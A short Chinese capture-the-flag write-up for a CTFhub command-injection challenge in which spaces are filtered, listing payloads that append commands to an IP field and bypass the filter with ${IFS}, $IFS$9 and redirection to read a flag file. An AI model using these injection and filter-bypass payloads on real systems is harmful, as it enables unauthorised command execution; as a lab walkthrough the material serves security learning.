CTFhub-RCE-过滤空格

1. 查看当前目录:127.0.0.1|ls

CTFhub-RCE-过滤空格_第1张图片

2.  查看 flag_890277429145.php

127.0.0.1|cat flag_890277429145.php

根据题目可以知道空格被过滤掉了 

 3.空格可以用以下字符代替:
< 、>、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

$IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。
同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。

payload:

127.0.0.1|cat

127.0.0.1|cat>flag_890277429145.php|base64

127.0.0.1|cat${IFS}flag_890277429145.php|base64

127.0.0.1|cat$IFS$9flag_890277429145.php|base64

CTFhub-RCE-过滤空格_第2张图片

base64 解密:

你可能感兴趣的:(CTFhub-RCE,android,安全,网络)